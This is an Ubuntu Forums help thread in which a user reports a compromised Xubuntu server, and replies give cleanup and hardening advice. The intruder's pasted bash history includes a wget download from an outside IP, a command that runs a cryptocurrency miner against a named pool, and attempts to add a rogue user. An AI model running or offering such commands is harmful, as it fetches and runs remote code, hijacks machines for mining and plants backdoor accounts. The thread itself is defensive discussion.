Page 1 of 3 123 LastLast
Results 1 to 10 of 26

Thread: Xubuntu 12.04/64, OpenSSH Server Hacked

Hybrid View

  1. #1
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Xubuntu 12.04/64, OpenSSH Server Hacked

    Last night I discovered a task on my Xubuntu 12.04/64 server (yes, conky is nice to have) as a process "m64.pl" used about 85-100% CPU time. After checking with everyone in my family I see the only option, I have got hacked, possibly through a Windows 7 computer since port 22 is closed in DSL router.

    Here is bash history left by hacker :

    free -m
    cat /proc/cpuinfo
    uname -a
    ls -l
    cd Public
    wget 79.114.47.143/m64.zip
    unzip m64.zip
    chmod +x *
    ./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
    ps -x
    pgrep minerd
    w
    ifconfig
    sude
    sudo
    sudo useradd ruut
    useradd ruut
    su root useradd
    exit

    To me it seems that someone has started a bitcoin task

    What I have done is killing the process, remove files in /Public (had to do it in root as they where locked) and uninstall "OpenSSH Server".

    Any suggestions on how to handle this would be most appreciated

    Morten (Smiling after all)
    Last edited by mbogevik; February 4th, 2014 at 07:54 PM.

  2. #2
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    It may be that the login is not a SSH login since both of my users says "Last login: Fri Jan 17 12:06:37 2014" while entering command "lastlog". Also I have Hamachi online on the computer. Still investigating...

  3. #3
    Join Date
    Jan 2008
    Location
    Bay Area, CA/Kanagawa, JP
    Beans
    248
    Distro
    Xubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

    i'd wipe and reinstall the system if i were you..

  4. #4
    Join Date
    Jan 2009
    Location
    South Carolina
    Beans
    Hidden!
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by brokenhachi View Post
    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

    i'd wipe and reinstall the system if i were you..
    +1 on wiping and reinstalling.

    Also, in the future be sure to disable password authentication in /etc/ssh/sshd_config.

    This is a great tutorial on how to setup key-based authentication with your ssh server.

  5. #5
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Yes, large number of login attempts in /var/log/auth.log...

    But the thing is I do not have port 22 open on router (DSL), only Teamspeak 3 server and my kids Minecraft server is open to the world.

    I think that I first need to find how this person got access, wipe and reinstall may not help if it is through a Windows 7 computer or any other "box" on my LAN, like Xbox 360, Raspberry Pi, VU++ satellite tuner, Popcorn media player or even the Synology DS213j NAS. But in the end I think the six computers with Windows 7 is the largest gift to a hacker.

    I check the netstat command when back from work
    Last edited by mbogevik; February 5th, 2014 at 12:23 PM.

  6. #6
    Join Date
    Nov 2013
    Location
    On the edge
    Beans
    843
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    This guy (the hacker) isn't the sharpest knife in the drawer. Check logs on your minecraft & teamspeak servers for connections to the same IP.

    It doesn't really matter how he got in. You could spend a ton of money and time trying to find out. I recommend you focus on inspecting each box the best you can for any evidence of intrusion. Then reimage the ones that are affected. Then figure out how to secure the network.

    This of course assumes you have backups... If you don't then unplug the network from the Internet and go buy yourself an external drive to copy all your data to it.
    Last edited by bashiergui; February 5th, 2014 at 04:07 PM.
    Knock knock.
    Race condition.
    Who's there?

  7. #7
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 16.04 Xenial Xerus

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by mbogevik View Post
    Yes, large number of login attempts in /var/log/auth.log...

    But the thing is I do not have port 22 open on router (DSL), only Teamspeak 3 server and my kids Minecraft server is open to the world.

    I think that I first need to find how this person got access, wipe and reinstall may not help if it is through a Windows 7 computer or any other "box" on my LAN, like Xbox 360, Raspberry Pi, VU++ satellite tuner, Popcorn media player or even the Synology DS213j NAS. But in the end I think the six computers with Windows 7 is the largest gift to a hacker.

    I check the netstat command when back from work
    You could also try posting a chunk of the auth.log after removing any personal information. Does the source IP show as coming from your internal network or from outside?

    Do you have uPNP enabled on your router?
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...

  8. #8
    Join Date
    Nov 2013
    Location
    On the edge
    Beans
    843
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    But the thing is I do not have port 22 open on router (DSL), only Teamspeak 3 server and my kids Minecraft server is open to the world.
    But you have port 22 open on your private network? Then I guess he opened it up to the internet. That would require a router reconfig. Do you have default credentials on the router?

    Here are my recommendations for someone technically savvy but not a professional security guy:

    1. Reset the router, wii, xbox, ps to factory settings. That will boot him off if he managed to own one of them.
    2. Download 2 or 3 antivirus free scanners (AVG, McAfee, malwarebytes, whatever. Jus pick a recognizable name). Install & update them on all windows boxes.
    3. Unplug the whole network from the internet.
    4. Scan all the windows desktops/laptops and servers with AV. If any infections are found then reimage it. You can copy data off onto an external drive relatively safely before you reimage if necessary.
    5. Inspect the windows servers for odd or missing event logs. Any signs of hacking just reimage.
    6. We already decided your ubuntu server is owned, so reimage that.

    Then as you rebuild the systems I encourage you to research how to secure the network and machines. Secure all your running services with keys if you can, strong long passwords if not. Don't allow anonymous ftp login. Make all the boxes automatically update. Install EMET on the Windows boxes. http://www.microsoft.com/en-us/downl....aspx?id=39273
    Use a firewall on each host. Disable upnp.
    Last edited by bashiergui; February 6th, 2014 at 03:36 AM.
    Knock knock.
    Race condition.
    Who's there?

  9. #9
    Join Date
    Jan 2008
    Location
    Bay Area, CA/Kanagawa, JP
    Beans
    248
    Distro
    Xubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    +1 for this. I'm a huge fan of malwarebytes and clamav. Also, the Kaspersky rescue disk is great for offline scanning (i.e livecd). If you dont know it, this is a great little gui for iptables based firewalls (among others): http://www.fwbuilder.org/

    If you need remote admin access to the network, maybe consider openvpn, or getting an actual firewall applicance (which i highly recommend, as its a great learning experience if you're interested in networking/security). You can then configure ipsec vpns and use shrew to connect when needed. You can pick up good deals from some sites..

    Good luck!

  10. #10
    Join Date
    Jun 2007
    Location
    Porirua, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Thread moved to Security Discussions.
    Forum DOs and DON'Ts
    Never assume that information you find using a search engine is up-to-date.
    Please use CODE tags.
    A low-volume blog

Page 1 of 3 123 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •